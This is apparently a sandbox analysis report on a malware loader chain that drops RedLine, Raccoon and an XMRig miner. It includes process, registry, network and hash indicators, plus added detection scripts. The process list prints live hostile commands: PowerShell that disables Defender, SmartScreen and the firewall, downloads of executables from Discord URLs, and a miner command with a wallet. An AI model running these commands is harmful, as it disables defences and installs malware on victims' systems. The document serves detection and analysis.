Analysis Overview
SHA256
1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8
Threat Level: Known bad
The file 1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8 was found to be: Known bad.
Malicious Activity Summary
SmokeLoader
RedLine Payload
xmrig
Modifies security service
Raccoon
RedLine
XMRig Miner Payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Executes dropped EXE
Downloads MZ/PE file
UPX packed file
Checks BIOS information in registry
Deletes itself
Reads user/profile data of web browsers
Themida packer
Loads dropped DLL
Reads user/profile data of local email clients
Drops startup file
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Program crash
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Modifies system certificate store
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-09-19 18:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-09-19 18:14
Reported
2021-09-19 18:16
Platform
win10-en
Max time kernel
150s
Max time network
146s
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Start = "4" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Raccoon
RedLine
RedLine Payload
SmokeLoader
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner Payload
Downloads MZ/PE file
Executes dropped EXE
UPX packed file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\48FE.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5B50.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5B50.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\2F3A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\215E.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\2F3A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\48FE.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\215E.exe | N/A |
Deletes itself
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3C5B.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Themida packer
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\5B50.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\215E.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\2F3A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\48FE.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\215E.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2F3A.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\48FE.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5B50.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4696 set thread context of 4716 | N/A | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe |
| PID 616 set thread context of 768 | N/A | C:\Users\Admin\AppData\Local\Temp\6B21.exe | C:\Users\Admin\AppData\Local\Temp\6B21.exe |
| PID 4600 set thread context of 1136 | N/A | C:\Users\Admin\AppData\Local\Temp\6023.exe | C:\Users\Admin\AppData\Local\Temp\6023.exe |
| PID 4172 set thread context of 2644 | N/A | C:\Users\Admin\AppData\Local\Temp\199b1g.exe | C:\Users\Admin\AppData\Local\Temp\199b1g.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\199b1g.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] | C:\Users\Admin\AppData\Local\Temp\fl.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\215E.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2F3A.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3517.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\48FE.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe
"C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe"
C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe
"C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe"
C:\Users\Admin\AppData\Local\Temp\215E.exe
C:\Users\Admin\AppData\Local\Temp\215E.exe
C:\Users\Admin\AppData\Local\Temp\2F3A.exe
C:\Users\Admin\AppData\Local\Temp\2F3A.exe
C:\Users\Admin\AppData\Local\Temp\3517.exe
C:\Users\Admin\AppData\Local\Temp\3517.exe
C:\Users\Admin\AppData\Local\Temp\3C5B.exe
C:\Users\Admin\AppData\Local\Temp\3C5B.exe
C:\Users\Admin\AppData\Local\Temp\48FE.exe
C:\Users\Admin\AppData\Local\Temp\48FE.exe
C:\Users\Admin\AppData\Local\Temp\512D.exe
C:\Users\Admin\AppData\Local\Temp\512D.exe
C:\Users\Admin\AppData\Local\Temp\5B50.exe
C:\Users\Admin\AppData\Local\Temp\5B50.exe
C:\Users\Admin\AppData\Local\Temp\6023.exe
C:\Users\Admin\AppData\Local\Temp\6023.exe
C:\Users\Admin\AppData\Local\Temp\6023.exe
C:\Users\Admin\AppData\Local\Temp\6023.exe
C:\Users\Admin\AppData\Local\Temp\6B21.exe
C:\Users\Admin\AppData\Local\Temp\6B21.exe
C:\Users\Admin\AppData\Local\Temp\6B21.exe
C:\Users\Admin\AppData\Local\Temp\6B21.exe
C:\Users\Admin\AppData\Local\Temp\6023.exe
C:\Users\Admin\AppData\Local\Temp\6023.exe
C:\Users\Admin\AppData\Local\Temp\6F48.exe
C:\Users\Admin\AppData\Local\Temp\6F48.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\6FED.bat C:\Users\Admin\AppData\Local\Temp\6F48.exe"
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/880498551011049495/883407469894856764/33.exe" "33.exe" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889204878965088268/889206644829982770/PLQRfphz.exe" "PLQRfphz.exe" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe
PLQRfphz.exe
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe "" "" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\745A.exe
C:\Users\Admin\AppData\Local\Temp\745A.exe
C:\Users\Admin\AppData\Local\Temp\fl.exe
"C:\Users\Admin\AppData\Local\Temp\fl.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(exit)
C:\ProgramData\Systemd\dllhoster.exe
-o pool.supportxmr.com:5555 -u 44z5DkTXSYBfYECbt5TdQ2SUpyAQJmmGubyUsWqzcByeKwxwsWSZabZQMuE39hedNcTL15eK8kHrAeZMUdGGmHQHBzNH5db -p bloodteam --coin=XMR --cpu-max-threads-hint=35
C:\Users\Admin\AppData\Local\Temp\199b1g.exe
"C:\Users\Admin\AppData\Local\Temp\199b1g.exe"
C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe
"C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe"
C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
C:\Users\Admin\AppData\Local\Temp\199b1g.exe
"C:\Users\Admin\AppData\Local\Temp\199b1g.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 924
C:\Users\Admin\AppData\Roaming\7974777.scr
"C:\Users\Admin\AppData\Roaming\7974777.scr" /S
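The PowerShell line and the XMRig command line in the process list above are the two most detectable steps of this chain: one disables Defender scanning of C:\, turns off SmartScreen policy and sets the Windows Firewall service (mpssvc) to Disabled (Start = 4); the other carries a pool address, a wallet and --coin=XMR in the clear. The following detection logic is an added example written for this page, not sandbox or vendor code. It runs over constructed Sysmon-style events (EventID 1 process creation, EventID 13 registry value set) modelled on the report, and the rule names are this example's own. One caveat it handles: the sample's command line uses U+2013 en dashes before Path and Name, which PowerShell accepts as parameter dashes, so the matcher folds them to ASCII before applying any rule.

```python
"""Detection logic for the defence-tampering and miner behaviour listed in this
report, run over constructed Sysmon-style events. Added example, not sandbox code."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample events modelled on the process list and registry signatures
# above. The PowerShell line keeps the sample's U+2013 en dashes before Path/Name.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": (
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
         r"$(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); "
         "$(New-ItemProperty \u2013Path $HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System "
         "\u2013Name EnableSmartScreen -PropertyType DWord -Value 0); "
         r"$(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc "
         r"-Name Start -Value 4); $(exit)")},
    {"EventID": "1", "Image": r"C:\ProgramData\Systemd\dllhoster.exe",
     "CommandLine": ("-o pool.supportxmr.com:5555 -u 44z5DkTXSYBfYECbt5TdQ2SUpyAQJmmGubyUs"
                     "WqzcByeKwxwsWSZabZQMuE39hedNcTL15eK8kHrAeZMUdGGmHQHBzNH5db "
                     "-p bloodteam --coin=XMR --cpu-max-threads-hint=35")},
    {"EventID": "13", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\SYSTEM\ControlSet001\Services\MpsSvc\Start",
     "Details": "DWORD (0x00000004)"},
    {"EventID": "13", "Image": r"C:\Users\Admin\AppData\Local\Temp\fl.exe",
     "TargetObject": (r"HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates"
                      r"\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob"),
     "Details": "Binary Data"},
    {"EventID": "1", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" notes.txt'},   # benign control
]

# PowerShell treats U+2013/U+2014/U+2015 as parameter dashes; fold them to '-'.
DASHES = str.maketrans({"\u2013": "-", "\u2014": "-", "\u2015": "-"})


def normalize_dashes(cmd: str) -> str:
    return cmd.translate(DASHES)


DEFENDER_EXCLUSION_RE = re.compile(r"add-mppreference\b.*-exclusion(path|process|extension)\b", re.I)
SMARTSCREEN_RE = re.compile(r"-name\s+enablesmartscreen\b.*-value\s+0\b", re.I)
MPSSVC_CMD_RE = re.compile(r"services\\mpssvc\b.*-name\s+start\s+-value\s+4\b", re.I)
# XMRig-style arguments: "-o host:port ... -u wallet"; pool and wallet are captured.
XMRIG_RE = re.compile(r"(?:^|\s)-o\s+(?P<pool>[\w.-]+:\d+).*?\s-u\s+(?P<wallet>\S+)")
MPSSVC_KEY_RE = re.compile(r"\\services\\mpssvc\\start$", re.I)
AUTHROOT_RE = re.compile(r"\\systemcertificates\\authroot\\certificates\\([0-9a-f]{40})\\blob$", re.I)

CMD_RULES: List[Tuple[str, re.Pattern]] = [
    ("defender_exclusion_added", DEFENDER_EXCLUSION_RE),
    ("smartscreen_disabled", SMARTSCREEN_RE),
    ("firewall_service_disabled", MPSSVC_CMD_RE),
]


def dword_value(details: str) -> Optional[int]:
    """Sysmon renders DWORDs as 'DWORD (0x00000004)'; sandbox exports write '"4"'."""
    m = re.search(r"0x([0-9a-f]+)", details, re.I)
    if m:
        return int(m.group(1), 16)
    m = re.search(r"\b(\d+)\b", details)
    return int(m.group(1)) if m else None


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, detail) pairs for every event that trips a rule."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        image = ev.get("Image", "")
        if ev.get("EventID") == "1":
            cmd = normalize_dashes(ev.get("CommandLine", ""))
            for name, pattern in CMD_RULES:
                if pattern.search(cmd):
                    findings.append((name, image))
            m = XMRIG_RE.search(cmd)
            if m:
                findings.append(("xmrig_style_miner_args",
                                 f"{image} pool={m['pool']} wallet={m['wallet']}"))
        elif ev.get("EventID") == "13":
            target = ev.get("TargetObject", "")
            if MPSSVC_KEY_RE.search(target) and dword_value(ev.get("Details", "")) == 4:
                findings.append(("firewall_service_disabled", f"{image} set {target} = 4"))
            m = AUTHROOT_RE.search(target)
            if m:
                findings.append(("authroot_certificate_added",
                                 f"{image} thumbprint={m.group(1).upper()}"))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}")
```

The registry rule for MpsSvc\Start fires independently of the command-line rule, so the firewall tampering is caught twice here (once from the PowerShell text, once from the resulting value write); in production the registry event is the more reliable of the two because it survives obfuscation of the command line. The AuthRoot rule is intentionally generic: any process creating a Blob value under AuthRoot\Certificates outside a Windows Update context is worth a look, not just the thumbprint from this report.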
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | venerynnet1.top | udp |
| US | 8.8.8.8:53 | kevonahira2.top | udp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| NL | 190.2.145.108:12608 | | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| NL | 193.56.146.36:80 | 193.56.146.36 | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| US | 8.8.8.8:53 | iryarahara.xyz | udp |
| RU | 77.246.145.4:80 | iryarahara.xyz | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.9.20.20:13441 | | tcp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | telete.in | udp |
| DE | 195.201.225.248:443 | telete.in | tcp |
| DE | 74.119.192.122:80 | 74.119.192.122 | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| DE | 74.119.192.122:80 | 74.119.192.122 | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| NL | 190.2.145.156:80 | | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| NL | 45.67.231.145:10991 | | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| NL | 45.81.225.228:10774 | | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| FI | 135.181.208.162:49195 | | tcp |
| US | 34.210.194.227:80 | | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| DE | 88.99.66.31:80 | iplogger.org | tcp |
| DE | 88.99.66.31:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.33.252:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 149.202.83.171:5555 | pool.supportxmr.com | tcp |
| US | 8.8.8.8:53 | dependstar.bar | udp |
| US | 172.67.160.135:443 | dependstar.bar | tcp |
| SC | 185.215.113.104:18754 | | tcp |
| DE | 88.99.66.31:443 | iplogger.org | tcp |
| DE | 88.99.66.31:443 | iplogger.org | tcp |
| RU | 91.142.77.155:5469 | | tcp |
| US | 8.8.8.8:53 | product-review-now.bar | udp |
| US | 172.67.128.27:443 | product-review-now.bar | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
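The Network table mixes DNS lookups, repeated connections to the same endpoint, and connections to raw IPs on high ports for which no lookup was ever made. The script below is an added example for this page (not sandbox code) that turns such a table into a de-duplicated indicator set: domains queried, the IPs each domain resolved to, a connection count per TCP endpoint, and the endpoints that never had a name behind them. The rows embedded in it are a constructed subset of the table above, and it tolerates the export quirk seen on this page where a row with no domain has its Proto value slid into the Domain column.

```python
"""Turn a sandbox Network table into a de-duplicated IOC set.
Added example for this page, not sandbox code."""
from collections import Counter
from typing import Dict, List, Optional

# Constructed subset of the rows above, including one shifted row whose Proto
# value sits in the Domain column, and one whose "domain" is just the IP again.
SAMPLE_ROWS = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | kevonahira2.top | udp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| RU | 45.144.67.29:80 | kevonahira2.top | tcp |
| NL | 190.2.145.108:12608 | tcp | |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 149.202.83.171:5555 | pool.supportxmr.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| NL | 193.56.146.36:80 | 193.56.146.36 | tcp |
"""

PROTOS = {"tcp", "udp"}
EMPTY = {"", "N/A"}


def parse_row(line: str) -> Optional[Dict[str, object]]:
    """Parse one '| Country | Destination | Domain | Proto |' row.
    Returns None for the header, blank lines and rows without four cells."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) != 4 or cells[0] == "Country":
        return None
    country, dest, domain, proto = cells
    if domain.lower() in PROTOS and proto in EMPTY:   # shifted row: Proto in Domain cell
        domain, proto = "", domain
    ip, _, port = dest.rpartition(":")
    if not ip or not port.isdigit():
        return None
    if domain in EMPTY or domain == ip:               # an IP literal is not a domain
        domain = ""
    return {"country": country, "ip": ip, "port": int(port),
            "domain": domain or None, "proto": proto.lower()}


def build_iocs(table: str) -> Dict[str, object]:
    rows = [r for r in map(parse_row, table.splitlines()) if r]
    dns_lookups = sorted({r["domain"] for r in rows
                          if r["proto"] == "udp" and r["port"] == 53 and r["domain"]})
    tcp_endpoints = Counter((r["ip"], r["port"]) for r in rows if r["proto"] == "tcp")
    resolutions: Dict[str, set] = {}
    for r in rows:
        if r["proto"] == "tcp" and r["domain"]:
            resolutions.setdefault(r["domain"], set()).add(r["ip"])
    resolved_ips = set().union(*resolutions.values()) if resolutions else set()
    # Endpoints no DNS name ever pointed at: typically hard-coded C2 addresses,
    # so they need their own blocklist entries rather than a domain sinkhole.
    raw_ip_endpoints = sorted(f"{ip}:{port}" for ip, port in tcp_endpoints
                              if ip not in resolved_ips)
    return {"dns_lookups": dns_lookups,
            "tcp_endpoints": dict(tcp_endpoints),
            "resolutions": {d: sorted(ips) for d, ips in resolutions.items()},
            "raw_ip_endpoints": raw_ip_endpoints}


if __name__ == "__main__":
    for key, value in build_iocs(SAMPLE_ROWS).items():
        print(key, value)
```

Counting connections per endpoint rather than collapsing them keeps the beaconing signal: on this page the loader's check-ins to 45.144.67.29:80 dominate the table, while the raw-IP endpoints on ports such as 12608 and 13441 each appear only once or twice and are easy to overlook without the separate list.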
Files
memory/4716-115-0x0000000000400000-0x0000000000408000-memory.dmp
memory/4716-116-0x0000000000402DCE-mapping.dmp
memory/4696-117-0x0000000000030000-0x0000000000039000-memory.dmp
memory/3080-118-0x0000000002960000-0x0000000002975000-memory.dmp
memory/4784-119-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\215E.exe
| MD5 | 9b739fca61cbe5a22bfe0b77cce75697 |
| SHA1 | 386760ae9e2cea9bf737e48d0d77c5b29ae9b1bd |
| SHA256 | c59cecf273089ec7e37fcc7a55b135067644dc3bd90abb4c6f81d9fd63744201 |
| SHA512 | 06377ab9e2e666bef740c8c1e7c194d38d60457728efb109bf59e1fbd5a23661acaafae90b7b230d43f067eb5bf806e8cc2eac8d12104d6c14bbac8e39ddb7fc |
memory/4784-123-0x0000000000F90000-0x0000000000F91000-memory.dmp
memory/4784-125-0x0000000005770000-0x0000000005771000-memory.dmp
memory/4784-126-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/4784-127-0x0000000077DF0000-0x0000000077F7E000-memory.dmp
memory/4784-128-0x0000000005270000-0x0000000005271000-memory.dmp
memory/4784-129-0x0000000002E30000-0x0000000002E31000-memory.dmp
memory/4784-130-0x0000000002E90000-0x0000000002E91000-memory.dmp
memory/4784-131-0x0000000002F20000-0x0000000002F21000-memory.dmp
memory/4920-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\2F3A.exe
| MD5 | 2276594f6417179702443734cc89341a |
| SHA1 | 2afd398c0408c5c41062a5ca0d43528e9a510ddf |
| SHA256 | 4c9c430cdca2a818a7c532a1ba924670bdd01e61f4e7d574123daab677e4c76e |
| SHA512 | cb023e562b73a297eb3f2c1f6577fb33635af0da31d1264a60a664dc59bbce84d723a498dba54be34adffece90aa76ac4e269a3aad50559424b3dfe6ba0bbf85 |
memory/4920-135-0x00000000009C0000-0x00000000009C1000-memory.dmp
memory/4920-140-0x0000000077DF0000-0x0000000077F7E000-memory.dmp
memory/4920-141-0x0000000005A00000-0x0000000006006000-memory.dmp
memory/5024-144-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3517.exe
| MD5 | 4a93f552d9a2747b134be963c4d1b044 |
| SHA1 | 7b96e56bc6b7df56ac4d0cda72dbc2d9be65f0e4 |
| SHA256 | 33bb7d8584f1353b048c0227977e9531a4125188a960babbc2a26307ca158275 |
